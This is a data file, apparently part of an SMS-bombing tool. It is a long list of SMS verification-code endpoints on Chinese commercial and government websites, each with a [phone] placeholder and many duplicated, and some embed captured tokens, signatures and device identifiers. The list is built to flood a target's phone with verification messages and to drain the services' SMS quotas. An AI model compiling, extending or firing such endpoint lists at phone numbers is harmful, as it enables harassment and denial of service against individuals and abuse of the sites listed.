"http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", - "http://activity.renren.com:80/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", - "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", - "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "http://my.ikang.com/loginUserReg/getGenerateCode?phone=[phone]", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]&net=wifi&", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", - "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", - "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://webapp.qianbao188.aloestec.com/v2/app/pub/channel/smsCode?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=1", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://www.chaojidaogou.com/MsgHandler.ashx?t=sendcode&phone=[phone]", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", - "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://xiangpai.jishiyuanwl.cn/api/public/?service=Login.GetCode0&mobile=[phone]&sign=2019&type=0", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]&source=verify", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", - "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://photograph.yuanlikj.cn/send/Send?appName=截图秀-对话生成器&TELMobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone 6s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - 